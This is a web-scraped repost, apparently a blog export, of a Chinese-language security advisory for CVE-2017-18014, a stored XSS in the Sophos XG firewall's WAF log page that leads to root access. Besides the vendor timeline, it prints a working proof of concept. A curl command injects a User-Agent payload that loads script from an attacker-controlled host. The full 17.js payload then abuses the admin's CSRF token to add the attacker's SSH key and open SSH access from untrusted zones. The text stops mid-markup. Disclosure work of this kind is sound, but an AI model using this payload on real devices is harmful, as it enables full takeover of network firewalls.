{"id":11197,"date":"2018-01-22T14:19:22","date_gmt":"2018-01-22T22:19:22","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/01\/22\/news-4968\/"},"modified":"2018-01-22T14:19:22","modified_gmt":"2018-01-22T22:19:22","slug":"news-4968","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/01\/22\/news-4968\/","title":{"rendered":"SSD\u5b89\u5168\u516c\u544a-Sophos XG\u4ece\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u5b58\u50a8\u578bXSS\u6f0f\u6d1e\u5230Root\u8bbf\u95ee"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 22 Jan 2018 11:52:38 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3645\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3645');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>\u6f0f\u6d1e\u6982\u8981<\/strong><br \/> \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728Sophos XG 17\u4e2d\u53d1\u73b0\u7684\u4e00\u4e2a\u5b58\u50a8\u578bXSS\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u8be5\u6f0f\u6d1e\u53ef\u4ee5\u83b7\u53d6root\u8bbf\u95ee\u3002<\/p>\n<p>Sophos XG\u9632\u706b\u5899\u201c\u5168\u65b0\u7684\u63a7\u5236\u4e2d\u5fc3\u4e3a\u7528\u6237\u7684\u7f51\u7edc\u63d0\u4f9b\u524d\u6240\u672a\u6709\u7684\u53ef\u89c6\u6027\u3002\u53ef\u4ee5\u83b7\u5f97\u4e30\u5bcc\u7684\u62a5\u544a\uff0c\u8fd8\u53ef\u4ee5\u6dfb\u52a0Sophos iView\uff0c\u4ee5\u4fbf\u8de8\u591a\u4e2a\u9632\u706b\u5899\u8fdb\u884c\u96c6\u4e2d\u62a5\u544a\u3002\u201c<\/p>\n<p><span id=\"more-3645\"><\/span><\/p>\n<p><strong>\u6f0f\u6d1e\u63d0\u4ea4\u8005<\/strong><br \/> \u4e00\u4f4d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u4eba\u5458\u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e<\/p>\n<p><strong>\u5382\u5546\u54cd\u5e94<\/strong><br \/> Sophos\u5df2\u88ab\u544a\u77e5\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u4ed6\u4eec\u7684\u56de\u5e94\u662f\uff1a<\/p>\n<ul>\n<li>12\u670811\u65e5\uff0c\u6211\u4eec\u6536\u5230\u5e76\u786e\u8ba4\u60a8\u63d0\u4ea4\u7684\u95ee\u9898<\/li>\n<li>12\u670812\u65e5\uff0c\u6211\u4eec\u786e\u8ba4\u4e86\u8fd9\u4e2a\u95ee\u9898\uff0c\u5e76\u5f00\u59cb\u8fdb\u884c\u4fee\u590d<\/li>\n<li>12\u670820\u65e5\uff0c\u6211\u4eec\u53d1\u5e03\u4e86XGv17 MR3\u7684\u5b98\u65b9\u4fee\u590d\uff1ahttps\uff1ahttps:\/\/community.sophos.com\/products\/xg-firewall\/b\/xg-blog\/posts\/sfos-17-0-3-mr3-released<\/li>\n<li>12\u670829\u65e5\uff0c\u6211\u4eec\u5b8c\u6210\u4e86\u5bf9\u4e4b\u524d\u53d1\u5e03\u7684XGv16\uff0cv16.5\uff0cv17\u7248\u672c\u7684\u4fee\u590d<\/li>\n<li>12\u670831\u65e5\uff0c\u6211\u4eec\u6839\u636e\u60a8\u7684\u8981\u6c42\u53d1\u5e03\u4e86\u6211\u4eec\u7684\u5b89\u5168\u516c\u544a\uff1ahttps:\/\/community.sophos.com\/kb\/en-us\/128024?elqTrackId=3a6db4656f654d65b352f526d26c6a17&#038;elq=1514ab02d2764e8cb73e6b0bdbe7e7be&#038;elqaid=2739&#038;elqat=1&#038;elqCampaignId=27053<\/li>\n<\/ul>\n<p>CVE\uff1aCVE-2017-18014<\/p>\n<p><strong>\u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f<\/strong><br \/> \u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u7528\u6237\u53ef\u4ee5\u5728webadmin\u754c\u9762\u4e2d\u7684WAF\u65e5\u5fd7\u9875\u9762\uff08\u63a7\u5236\u4e2d\u5fc3 &#8211; >\u65e5\u5fd7\u6d4f\u89c8\u5668 &#8211; >\uff0c\u5728\u8fc7\u6ee4\u5668\u9009\u9879\u201cWeb\u670d\u52a1\u5668\u4fdd\u62a4\u201d\u4e2d\uff09\u4e2d\u89e6\u53d1\u5b58\u50a8\u578bXSS\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u53ef\u6267\u884c\u9632\u706b\u5899webadmin \u53ef\u4ee5\u6267\u884c\u7684\u4efb\u4f55\u52a8\u4f5c\uff08\u521b\u5efa\u65b0\u7684\u7528\u6237\/ \u542f\u7528ssh\u548c\u6dfb\u52a0ssh\u6388\u6743\u5bc6\u94a5\u7b49\uff09\u3002<\/p>\n<p>\u4e3a\u4e86\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u6211\u4eec\u5c06\u6f14\u793a\u4ee5\u4e0b\u573a\u666f\uff1a<\/p>\n<ul>\n<li>Sophos XG Firewall\u914d\u7f6e3\u4e2a\u533a\u57df\uff1aTrusted\uff0cUntrusted\uff0cDMZ<\/li>\n<li>WEB\u670d\u52a1\u5668\u88ab\u653e\u7f6e\u5728DMZ\u4e2d<\/li>\n<li>\u9632\u706b\u5899\u4f7f\u7528Sophos\u63a8\u8350\u7684\u9ed8\u8ba4Web\u5e94\u7528\u9632\u706b\u5899\uff08WAF\uff09\u4fdd\u62a4Web\u670d\u52a1\u5668\u3002<\/li>\n<li>\u6765\u81eaUntrusted\u7f51\u7edc\u7684\u653b\u51fb\u8005\u5411DMZ\u4e2d\u7684Web\u670d\u52a1\u5668\u53d1\u9001URL\u8bf7\u6c42\uff0c\u9020\u6210\u5230\u811a\u672c\u6ce8\u5165WAF\u65e5\u5fd7\u9875\u9762<\/li>\n<li>\u6765\u81eaTrusted\u7684\u7ba1\u7406\u5458\u8bbf\u95eeWAF\u65e5\u5fd7\u9875\u9762<\/li>\n<li>\u6ca1\u6709\u4efb\u4f55\u5176\u4ed6\u4ea4\u4e92\u6216\u8b66\u544a\uff0c\u811a\u672c\u5411\u7ba1\u7406\u7528\u6237\u6dfb\u52a0\u4e00\u4e2aSSH\u6388\u6743\u5bc6\u94a5\uff0c\u5e76\u5141\u8bb8\u6765\u81eaUntrusted\u7684ssh\u7ba1\u7406\u3002<\/li>\n<li>\u653b\u51fb\u8005\u83b7\u5f97\u5b8c\u6574\u7684root ssh shell<\/li>\n<\/ul>\n<p>Sophos XG WAF\u65e5\u5fd7\u9875\u9762\u5c06\u6267\u884cPOST\u8bf7\u6c42\u4e2d\u201cUser-Agent\u201d\u53c2\u6570\u3002<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2.jpg\" data-slb-active=\"1\" data-slb-asset=\"1866928938\" data-slb-internal=\"0\" data-slb-group=\"3645\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" class=\"alignnone size-medium wp-image-3615\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-300x169.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-768x432.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-1024x576.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2.jpg 1280w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>\u6f0f\u6d1e\u8bc1\u660e<\/strong><\/p>\n<p><u>Sophos XG\u914d\u7f6e:<\/u><\/p>\n<ul>\n<li>\u9632\u706b\u5899\u63a5\u53e3\u53ef\u4fe1 &#8211; 192.168.10.190\u7aef\u53e3A.<\/li>\n<li>\u9632\u706b\u5899\u63a5\u53e3\u4e0d\u53ef\u4fe1 &#8211; 192.168.0.192\u7aef\u53e3B.<\/li>\n<li>\u9632\u706b\u5899\u63a5\u53e3DMZ &#8211; 192.168.20.190\u7aef\u53e3C.<\/li>\n<\/ul>\n<p><u>\u73af\u5883<\/u><\/p>\n<ul>\n<li>Sophos XG Fireweal\u7ba1\u7406\u754c\u9762\u5728https:\/\/192.168.10.190:4444\/webconsole\/webpages\/login.jsp<\/li>\n<li>\u7ba1\u7406\u5458PC Trusted\u7f51\u7edcIP\uff1a192.168.10.191<\/li>\n<li>\u5728DMZ\u7f51\u7edc\u4e2d\uff0c\u201cWebserver\u201d\u53ef\u4ee5netcat 192.168.20.191<\/li>\n<li>\u5728Unrusted\u7f51\u7edc\u4e2d\uff0c\u653b\u51fb\u8005\u63a7\u5236\u7f51\u7ad9IP\uff1a192.168.0.12<\/li>\n<\/ul>\n<p>\u653b\u51fb\u8005PC\u521b\u5efa\u4e00\u4e2assh\u8ba4\u8bc1\u5bc6\u94a5\uff08\u7a7a\u5bc6\u7801\uff09\uff1a<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a66636a489a2470651014\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> ssh-keygen -t rsa<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>\u7136\u540e\u8bfb\u53d6pub key &#8211; \u8fd9\u4e2a\u5bc6\u94a5\u5c06\u7528\u4e8e\u653b\u51fb\u3002<\/p>\n<p>\u8bf7\u6ce8\u610f\uff0c\u5c06\u5bc6\u94a5\u63d2\u5165\u653b\u51fb\u811a\u672c\u65f6\uff0c\u5fc5\u987b\u5bf9\u5bc6\u94a5\u7684\u4e00\u90e8\u5206\u8fdb\u884c\u7f16\u7801 &#8211; \u6bcf\u4e2a\u201c+\u201d\u5fc5\u987b\u66ff\u6362\u4e3a\u201c\uff052B\u201d\u3002<\/p>\n<p>\u4fee\u653917.js\u811a\u672c\uff08\u89c1\u4e0b\u9762\uff09\u7528\u4f60\u7684pub key\u66ff\u6362===> INSERT-YOUR-PUB-KEY < ===  \u5c06\u4e3b\u673a17.js\u66f4\u6539\u4e3a\u4f60\u7684\u7f51\u7ad9\u3002  \u73b0\u5728\u8fd0\u884cfollow cURL\u547d\u4ee4\uff0c\u6ce8\u5165\u201cUser-Agent\u201d\uff1a   <\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a66636a489ad306075240\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> curl &#8220;http:\/\/WEBSERVER.COM&#8221; -H &#8220;Host: 192.168.0.192&#8221; -H &#8220;User-Agent:PERU&lt;i hidden&gt;&lt;iframe onload=&#8221;function JS(){var iH = document.getElementsByTagName(&#8216;head&#8217;)[0];var my = document.createElement(&#8216;script&#8217;);my.type = &#8216;text\/javascript&#8217;;my.src = &#8216;https:\/\/www.AttackerControlledWebsite.COM\/17.js&#8217;;iH.appendChild(my);};JS();&#8221;&gt;&lt;\/iframe&gt;&lt;\/i&gt;peru&#8221;     To trigger the attack, from admin PC, go to the log page (Log Viewer &gt; Web Server Protection) and move mouse over the packet details     Connect to  Sophos XG using ssh from attack PC (username is admin):    &lt;u&gt;17.js&lt;\/u&gt;        &lt;pre class=&#8221;lang:default decode:true &#8221; &gt;var iframe1 = document.createElement(&#8216;iframe&#8217;);  iframe1.id = &#8216;peruid&#8217;;  iframe1.style = &#8216;width:0; height:0; border:0; border:none; vivibility:0&#8217;;  document.body.appendChild(iframe1);  var iframe2 = document.createElement(&#8216;iframe&#8217;);  iframe2.id = &#8216;peruid2&#8217;;  iframe2.style = &#8216;width:0; height:0; border:0; border:none; vivibility:0&#8217;;  document.body.appendChild(iframe2);  var url = window.location.href;  var arr = url.split(&#8216;\/&#8217;);  var IPV = arr[0] + &#8216;\/\/&#8217; + arr[2];  var arr2 = url.split(&#8216;=&#8217;);  var csrf = arr2[2];  var ajax = &#8216;{&#8220;username&#8221;:&#8221;admin&#8221;,&#8221;allowpubkeyauth&#8221;:&#8221;1&#8243;,&#8221;sshkey&#8221;:[&#8220;===&gt;INSERT-YOUR-PUB-KEY&lt;===&#8221;]}&#8217;;  var param = &#8220;csrf=&#8221;+csrf+&#8221;&amp;mode=2501&amp;Event=UPDATE&amp;Entity=PublicKeyAuth&amp;json=&#8221;+ajax+&#8221;&amp;__RequestType=ajax&amp;t=1507131213973&#8221;;  var xhttp = new XMLHttpRequest();  xhttp.open(&#8216;POST&#8217;, IPV+&#8217;\/webconsole\/Controller&#8217;, true);  xhttp.setRequestHeader(&#8220;Content-type&#8221;, &#8220;application\/x-www-form-urlencoded&#8221;);  xhttp.onreadystatechange = function() {  if (xhttp.readyState == 4 &amp;&amp; xhttp.status == 200) {       var doc = document.getElementById(&#8220;peruid&#8221;).contentWindow.document;       doc.open();       doc.write(xhttp.responseText);       doc.close();        }    }  xhttp.send(param);  var ajax2 = &#8216;{&#8220;localaclid&#8221;:[&#8220;LAN#2&#8243;,&#8221;LAN#4&#8243;,&#8221;LAN#6&#8243;,&#8221;LAN#13&#8243;,&#8221;LAN#5&#8243;,&#8221;LAN#9&#8243;,&#8221;LAN#8&#8243;,&#8221;LAN#14&#8243;,&#8221;LAN#10&#8243;,&#8221;LAN#7&#8243;,&#8221;LAN#38&#8243;,&#8221;LAN#23&#8243;,&#8221;LAN#18&#8243;,&#8221;WAN#4&#8243;,&#8221;WAN#10&#8243;,&#8221;WAN#38&#8243;,&#8221;DMZ#10&#8243;,&#8221;DMZ#38&#8243;,&#8221;DMZ#18&#8243;,&#8221;VPN#18&#8243;,&#8221;WiFi#2&#8243;,&#8221;WiFi#4&#8243;,&#8221;WiFi#6&#8243;,&#8221;WiFi#13&#8243;,&#8221;WiFi#5&#8243;,&#8221;WiFi#9&#8243;,&#8221;WiFi#8&#8243;,&#8221;WiFi#14&#8243;,&#8221;WiFi#10&#8243;,&#8221;WiFi#7&#8243;,&#8221;WiFi#38&#8243;,&#8221;WiFi#23&#8243;,&#8221;WiFi#18&#8221;]}&#8217;;  var param2 = &#8220;csrf=&#8221;+csrf+&#8221;&amp;mode=72&amp;json=&#8221;+ajax2+&#8221;&amp;__RequestType=ajax&#8221;;  var xhttp2 = new XMLHttpRequest();  xhttp2.open(&#8216;POST&#8217;, IPV+&#8217;\/webconsole\/Controller&#8217;, true);  xhttp2.setRequestHeader(&#8220;Content-type&#8221;, &#8220;application\/x-www-form-urlencoded&#8221;);  xhttp2.onreadystatechange = function() {  if (xhttp2.readyState == 4 &amp;&amp; xhttp.status == 200) {       var doc = document.getElementById(&#8220;peruid2&#8221;).contentWindow.document;       doc.open();       doc.write(xhttp2.responseText);       doc.close();        }    }  xhttp2.send(param2);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636a489ad306075240-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636a489ad306075240-50\">50<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-1\"><span class=\"crayon-i\">curl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;http:\/\/WEBSERVER.COM&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">H<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Host: 192.168.0.192&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">H<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;User-Agent:PERU&lt;i hidden&gt;&lt;iframe onload=&#8221;function JS(){var iH = document.getElementsByTagName(&#8216;head&#8217;)[0];var my = document.createElement(&#8216;script&#8217;);my.type = &#8216;text\/javascript&#8217;;my.src = &#8216;https:\/\/www.AttackerControlledWebsite.COM\/17.js&#8217;;iH.appendChild(my);};JS();&#8221;&gt;&lt;\/iframe&gt;&lt;\/i&gt;peru&#8221;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-3\"><span class=\"crayon-st\">To<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">trigger <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">attack<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">admin <\/span><span class=\"crayon-v\">PC<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">go <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">log <\/span><span class=\"crayon-e\">page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Log <\/span><span class=\"crayon-v\">Viewer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Web <\/span><span class=\"crayon-e\">Server <\/span><span class=\"crayon-v\">Protection<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">move <\/span><span class=\"crayon-e\">mouse <\/span><span class=\"crayon-e\">over <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">packet <\/span><span class=\"crayon-e\">details <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-5\"><span class=\"crayon-e\">Connect <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Sophos <\/span><span class=\"crayon-e\">XG <\/span><span class=\"crayon-e\">using <\/span><span class=\"crayon-e\">ssh <\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">attack <\/span><span class=\"crayon-e\">PC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">username <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-7\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">u<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">17.js<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">u<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-9\"><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-10\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">pre <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;lang:default decode:true &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-h\"> 